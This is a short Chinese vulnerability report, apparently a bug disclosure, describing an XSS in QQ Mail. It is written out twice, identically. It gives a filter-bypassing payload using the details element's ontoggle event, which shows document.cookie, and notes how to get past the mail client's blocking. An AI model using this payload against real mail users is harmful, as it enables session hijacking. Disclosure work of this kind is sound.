漏洞细节
额javascript中on事件挺多,找了个不被过滤的。。。
为了方便操作用QQ邮箱源码模式进行发送,为了发送成功需要添加一些文字内容不然会被拦截
<details ontoggle="confirm(document.cookie)">
xss
<summary>click me</summary>xssxssxss
</details>
可在Google Chrome Opera Safari下执行,我在Chrome上测试的。
额javascript中on事件挺多,找了个不被过滤的。。。
为了方便操作用QQ邮箱源码模式进行发送,为了发送成功需要添加一些文字内容不然会被拦截
<details ontoggle="confirm(document.cookie)">
xss
<summary>click me</summary>xssxssxss
</details>
可在Google Chrome Opera Safari下执行,我在Chrome上测试的。